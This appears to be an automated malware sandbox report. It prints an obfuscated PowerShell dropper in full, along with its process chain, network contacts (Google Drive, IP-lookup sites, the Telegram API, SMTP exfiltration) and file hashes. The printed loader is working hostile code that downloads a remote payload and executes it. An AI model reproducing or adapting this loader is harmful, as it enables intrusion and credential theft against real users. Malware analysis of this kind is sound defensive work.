gnrGAirst( rebo$ ZapoEBe aafMa daFStemnEDis gkTilriT tudiU LulleSkaltrDomm.i,ommenGodviGF emve YndeR Un c)F,sto ');Stormagtskonflikten (Unclogs 'Sats $HavagG nmanlSpit,op ilaB TilsAMeasolAnati:,lommTGen ea OggaR,orilA olignBredstJagtrIInsi SlimnotZo,el=For a$StlndFCit ooTrep,RSociakObseraHjre,mKla lRRetroE,arke.Fejltssailou traBhjdedSNett TF,rderge,ati DecanDiskegTjr e(Velou$.unctpSemi E KaolrMockfOPrewexMinigY JungLReimb,Unsta$ hylarPo ssUChainSUnchrkbl,kdeDiagnNExactdCa.loeScunnS Read2Ind.s5Imper4Re ni)C,rat ');Stormagtskonflikten $Tarantist;"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Overjealously Henblikkets Prearrangement Tidmangelen #>;$kookeree='Desensitize';<#Umisforstaaeligheds Kludged Edingtonite Funktionskort #>; function Unclogs($Ruskregne){If ($host.DebuggerEnabled) {$Approximatenfold++;}$voice=$Flittiglisernes+$Ruskregne.'Length' - $Approximatenfold; for ( $Approximate=5;$Approximate -lt $voice;$Approximate+=6){$Benedicerendes=$Approximate;$Hittite44+=$Ruskregne[$Approximate];}$Hittite44;}function Stormagtskonflikten($Bolstederne){ .($Popsanger) ($Bolstederne);}$Domesticeringernes=Unclogs ' ,dskMFatheoSpritzResoriHalfwlStavelAnem aMult./S rud ';$Gttevrkets=Unclogs 'U sagTKeratlDoce scale 1Rntge2hilbo ';$Kalaset='O,cip[MelleNSpidsEjellyt Cont. Lgstsarb,jE V inrDubitVPhil,IBacchcF turET matPTestaoEpiphiSch,dNBostyTwhipsMsteapACephanPoseraDulc GVarifePsychrCheva]no el:outsm: MdeasKasseeBetr.cRed.cuCapitr EneriMik,oTEkspoYSvovlPTemper SansoSu.faT Kne OEsc iC H deo scutlDecim=,elon$Blythg NatstS verTOmkrsEBiosyvBac frno arkPurliEOph,lTledelsBookn ';$Domesticeringernes+=Unclogs 'Grade5Subma. Divi0Frdig Slidd(For,eWForfliC.urnnPartidArgumoUdkrewRu,insBasia NeddmN.hickTfluid kramm1Overf0Philo. Frai0Stude;Hauss .ikarW tymi ChrinRaadv6Eunuc4Bulim; cod. HypopxFinan6Overm4Sort.; Besh G.thrLactevArkit:T.ipo1Longi3 Obs,1Nonva.Stalw0 Proc) Le n NonprGHistoe Di pcBrandkCrescoSubat/Pol r2 Thre0Sixer1Firef0Hepto0For.k1 b il0Jaghi1Bibli GwineFTyvstiUntu.r ContePelobf I teoSavlexPeddi/ awn1Dukke3 Befr1Morti.S ing0Azotu ';$Skolemnds=Unclogs 'M crouPrio SGytasEFo ieRPro i-UforgaDcth GGaardE Eft,nAfghaTPosse ';$Balletdanseren=Unclogs 'Rrfl h ,ivitM.noctIndbapLan is,onis:purve/Idiod/Unde,d HvesrElektidiss v ResteTr,gl. Su cgUnaddoInt.roregulg KalilCityte Tame.Fis,ecEraseoakrosm B,dr/ bankuQuatecExurb? 
romaeMun,mx FolkpOutjuoIronhrBarogtAjo.r=Freied AwayoStartwDupernOntogl StraoOpsiga Sancd Rise& Pha.i Mor d sra=Fulds1 KrobFDrmmeitopfoselain2F,rgim ssasc Curp5GenneDRentehMar pl SkrilfacunXunwa wKalunQ ToroKTypo,s scorURes,wYEcb,ltOmplaP LivsY ,istbHydroq TeksnRgerlEgooro_.rkitn Beg,2 ServxHypohXEj ct9 ,estPApote ';$Adead=Unclogs 'Sweaz>Abrup ';$Popsanger=Unclogs 'YdelsIPolypESkiffXRclam ';$Bregnerdderne238='Prveballons229';$Riverwise='\precompelling.Wit';Stormagtskonflikten (Unclogs 'Zooli$ TestG Irr.L.ntieo tupebNi,roA brndLCerio:FryseuLaa.tNI dbia FlyvtP osetKommuEAer fnArchau HaplALinjeT VulgeJ,rdldObtru=Hacie$ProbleApathNTre lVSeign:CreneAThixlPUdsulPAppendRetn AHirplTImpasADovek+T ven$ScoutRAspa i.ninnVScenaeSoelvrpagenw nsuiIMooras HeltEDecar ');Stormagtskonflikten (Unclogs ' G wd$ Yoemg Sab l lokpoBit ebDatarADhalsLMulti:NondeADosisfSpillbCondyaalfedRHeltakFriseEEriabDO.ontEBroho=Sikk $End.cBIlliqA DbesL icrolRetsiEMaal.tSqua dMilieaSam en fnyssAnlacEDimwirPara.EunshrN Nabo.Dec mSAntipPAlkohlSkabaIInarcTAut n( Diss$ThromAHeapeDWanteeS.rabaRectod A ar)Fngse ');Stormagtskonflikten (Unclogs $Kalaset);$Balletdanseren=$Afbarkede[0];$Pseudoprophetic=(Unclogs 'Coeva$SydligStraiLLanciO BlambankarAun.erl Ruf.:Sa ttf.aemorOrigiAAr,anTMilzbR OuttILaypecChe oE Blo,l .linlNskedIFir b= MatzNMa ieEBerbeWForud-En ocoRefraBNewtsJin.elEPinloCSekstT N.ns Sel rsSnarey Melos ShibtEliz eRedesMTaple.CrystNAlte eStag TDisso.LobelWTrje.eVaarebKanticArbejlGyngeiLighte rub.n Pr.ftGru d ');Stormagtskonflikten ($Pseudoprophetic);Stormagtskonflikten (Unclogs 'Bagfl$SnkelFKaukarEpidiaSpalat ynkrMimediTartrcIllureAsi.hlFaultlRese iForkt.AmoraH .ndieAbsina LestdBiaseeFaderr .edisI.dgr[Hegni$BoolsS.nletk AfproBillelSkylleNominmIntranDrueadBugvgsUmb s]Caskt=Fonot$MnstrDPiet oVandrmOrkese f,rss Sodet rippiUncomcPotfue varsrWardriSelvfnG ynhg Garve des rStraan nadjeOpmars esin ');$Kraplak=Unclogs 'Indkr$GjedoF.ismurThoraaSerfdtSessirForboiIndtac nedbePlo tlV derlCoanniStuvn.Fngs,DSaluboGe 
erwdisfanOpverlRipenoslee a MicrdAp erFZ.gonireboilFo eseBelre(udsa $ DelvBrefleaPurublKonfolFremgePrambtHorisdGrunda nhann Ma.tsRhymieFornyr.ortreTortunNeu o,Stem,$bankeM Usaai Tr,akNonocr Bundoconvuf proliFove lH.moem HereesarcenSka.psUnamu)advis ';$Mikrofilmens=$Unattenuated;Stormagtskonflikten (Unclogs 'Nierf$spiraGspayrlSluknOMul tB SnorADagsal Angu: ProtSAd okvIndusIUtopiNBit ee egnesUn.tiT ichIRappoereconRPol g=kon e(DensaTAdduceBahanSKlkniTSprog-TjrehP tora.lueftEndeghAntip ,oret$CoracMst vaiPostmKv ldlRImpeto GideF ,erriPersoLOprrsm CresEIn,ekNen lesCourt) tild ');while (!$Svinestier) {Stormagtskonflikten (Unclogs 'Ursic$ GammgFiftyl Re do elfabNonnoaGermal Pros:Ma.kiRkonsteS lsogHalvfoRenrirUsknngImpe e iewpdUnder=Rudol$KalmytlystfrBorogubere.eMac o ') ;Stormagtskonflikten $Kraplak;Stormagtskonflikten (Unclogs 'FreonS arnsTCzechaEuropROutfiTForep-Grundshok.dLDenitEAblooeMaccaP Ex a ,usin4humin ');Stormagtskonflikten (Unclogs 'Micro$automgSodaklIn,tiO PostBBulltASt knlForso: S.orSA,thoVKilobiSalpeN pfolEOft nSMicr T ekski DomseN,kesrMyxop= Sti (H antTHa meEJa ovs Peept Coff- .ntipSpgelARe naTBr chHOr,de ytho$TygniM S.eei eripKMadeiRpreglo HypeF WatcI Neb LFogedMOrnamEgtternIg,ngsAstig)Debou ') ;Stormagtskonflikten (Unclogs ' Do n$A poiGRu inLBoendOSlskiB Stemasl sklDybs :MajesfForrauSikk LRoll dAgatibDe roEOecisfGysenA A,boR Bl gE ContN LettTHirsc=B yba$ nglugP ytylFord OWrathBTypolA ProslWooll:De asNA.svioBlennn.pholIAnmelNLystpTMollieS imiRRepinpOverloDeducl AnanAKbestt B.adiQuartO AiglNYdels+ arpa+Forfl% Basi$Un laASpn ifJordfBNephraSkattRsporskdoorhEArterDAli ne Octi. 
GenrCMutatOOmf ruSulevnBotrytK.mme ') ;$Balletdanseren=$Afbarkede[$Fuldbefarent];}$Peroxyl=312718;$Ruskendes254=32260;Stormagtskonflikten (Unclogs ' Cent$BourdgD nnilHundeOFribbbCombiA MiniLEcorc:Ar,hrC HowieLimstn ofretA.staR HedganymphlAnon,B E,vaif lmbB nstilSubliI upploReg ltLea.lE Hebek ThanEE,ecttStykesFolli Komm= Aftr ComptGVu cae TripT bayo-Nse ocretraoBagbun isketUndereBehovnSemifTDisti Ensi$Glas.MUklarISlutsKForanrAstr,OTr prf enhoiMorsiLArkivmPrizeeFootsn SurisKonto ');Stormagtskonflikten (Unclogs 'Stats$FinangCheirl Me co Fredb,arabaDyrkel C lh: A,idENervsf FlavfMiliteBrnehk Obclt Trsku FugleDenimr SpliiKakaonS ibsgKompaeC rrur Over Toil= Krem Ops e[ C anSOffenyAfruns,eignt PiraeAtlasm Raa . isquCGodkeoVejrmn enervUncites,ruerColont ,iks]Troub:Zoili:BichrFMononrSterso M slmuntunBEscheaBrug.sTypoge nva6Fyrre4Lsr.vSsh,pstPlantrCentii Ank n.kramgFordr(sepia$NisnaCDiadeeNummenKickotRecovrWou daSq irltastebCu geiKlippbreincl lamiPohapoFuturt T igeKisbokDeareeVer etLoesssSpott)Limit ');Stormagtskonflikten (Unclogs ' Drmm$GstelG,emogLformtO On.dbAllocaInko lUnder:Zar.bF AartoDithir EskaKBew tANyquiManl sr Sel EN.tli Hudor=Genda Spild[O.dstSsjlssySubliSAttertRegieE Ka sMTrisi. Tarwt.bscaeAdatjX MeriTChrem.MajusE livenPakkeC OpleO B ngdSelvhIN rmaNBar egIm.ib]Annui:Klaus:ChairajerimSSmergcHyperiSgnedIUdbaa. KdkrG BreveReinttant pSMatemT ksperPlagiISem nNV gnrGAirst( rebo$ ZapoEBe aafMa daFStemnEDis gkTilriT tudiU LulleSkaltrDomm.i,ommenGodviGF emve YndeR Un c)F,sto ');Stormagtskonflikten (Unclogs 'Sats $HavagG nmanlSpit,op ilaB TilsAMeasolAnati:,lommTGen ea OggaR,orilA olignBredstJagtrIInsi SlimnotZo,el=For a$StlndFCit ooTrep,RSociakObseraHjre,mKla lRRetroE,arke.Fejltssailou traBhjdedSNett TF,rderge,ati DecanDiskegTjr e(Velou$.unctpSemi E KaolrMockfOPrewexMinigY JungLReimb,Unsta$ hylarPo ssUChainSUnchrkbl,kdeDiagnNExactdCa.loeScunnS Read2Ind.s5Imper4Re ni)C,rat ');Stormagtskonflikten $Tarantist;"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\SysWOW64\msiexec.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 142.250.187.206:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 172.217.16.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 206.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| GB | 142.250.187.206:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.187.227:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| GB | 142.250.187.227:80 | o.pki.goog | tcp |
| GB | 172.217.16.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 227.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | checkip.dyndns.org | udp |
| US | 193.122.130.0:80 | checkip.dyndns.org | tcp |
| US | 8.8.8.8:53 | 92.12.20.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.130.122.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | reallyfreegeoip.org | udp |
| US | 172.67.177.134:443 | reallyfreegeoip.org | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 134.177.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | mail.jacopopacchioni.com | udp |
| IT | 89.40.173.128:587 | mail.jacopopacchioni.com | tcp |
| US | 8.8.8.8:53 | 128.173.40.89.in-addr.arpa | udp |
| IT | 89.40.173.128:587 | mail.jacopopacchioni.com | tcp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp |
Files
memory/3032-4-0x00007FF98A933000-0x00007FF98A935000-memory.dmp
memory/3032-10-0x00000216EE460000-0x00000216EE482000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ygkeupge.013.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3032-15-0x00007FF98A930000-0x00007FF98B3F1000-memory.dmp
memory/3032-16-0x00007FF98A930000-0x00007FF98B3F1000-memory.dmp
memory/3032-19-0x00007FF98A933000-0x00007FF98A935000-memory.dmp
memory/3032-20-0x00007FF98A930000-0x00007FF98B3F1000-memory.dmp
memory/3032-21-0x00007FF98A930000-0x00007FF98B3F1000-memory.dmp
memory/3032-24-0x00007FF98A930000-0x00007FF98B3F1000-memory.dmp
memory/1620-25-0x0000000002700000-0x0000000002736000-memory.dmp
memory/1620-26-0x00000000052D0000-0x00000000058F8000-memory.dmp
memory/1620-27-0x0000000005140000-0x0000000005162000-memory.dmp
memory/1620-28-0x00000000051E0000-0x0000000005246000-memory.dmp
memory/1620-29-0x0000000005900000-0x0000000005966000-memory.dmp
memory/1620-39-0x00000000059E0000-0x0000000005D34000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 2247453c28acd1eb75cfe181540458a8 |
| SHA1 | 851fc5a9950d422d76163fdc6a453d6859d56660 |
| SHA256 | 358b8df2d92a70274c5ec8e50bf6353c37a7fe1855fd9659f610f8a96eac19bd |
| SHA512 | 42475e640ee70ab4bd7350dbd970c5862f1597918b6a5e3ee038a10a5c5b883ac61038ecec51a7bfe7cb615798d832fae4a3ead9571f35825a644dee1f2dd7d3 |
memory/1620-41-0x0000000006020000-0x000000000603E000-memory.dmp
memory/1620-42-0x0000000006050000-0x000000000609C000-memory.dmp
memory/1620-43-0x0000000007820000-0x0000000007E9A000-memory.dmp
memory/1620-44-0x00000000065A0000-0x00000000065BA000-memory.dmp
memory/1620-45-0x0000000007280000-0x0000000007316000-memory.dmp
memory/1620-46-0x0000000007220000-0x0000000007242000-memory.dmp
memory/1620-47-0x0000000008450000-0x00000000089F4000-memory.dmp
C:\Users\Admin\AppData\Roaming\precompelling.Wit
| MD5 | 121104fabf2ff99a0b51a39ef26be7a0 |
| SHA1 | 2bfe2c2ecb97fc48c7d0819cbbceccdb65e0acd7 |
| SHA256 | ca1195af4e1d3e7014c66dc288f54119cae1d3e69e10c8617ab69d7b9f2fab85 |
| SHA512 | c95db7463111bd67979c92f70ac94bc5441983c32cbbf959807edb6c2f9a94ee7bc3154e179b419d486e173428589e22123d78bc949a5e2f63077f54cf4b3b8e |
memory/1620-49-0x0000000008A00000-0x000000000B256000-memory.dmp
memory/1936-62-0x0000000001040000-0x0000000002294000-memory.dmp
memory/1936-63-0x0000000001040000-0x000000000108A000-memory.dmp
memory/1936-64-0x0000000022C00000-0x0000000022C9C000-memory.dmp
memory/1936-66-0x00000000236C0000-0x0000000023882000-memory.dmp
memory/1936-67-0x0000000022FB0000-0x0000000023000000-memory.dmp
memory/1936-68-0x0000000023DC0000-0x00000000242EC000-memory.dmp
memory/1936-71-0x0000000023930000-0x00000000239C2000-memory.dmp
memory/1936-72-0x0000000020770000-0x000000002077A000-memory.dmp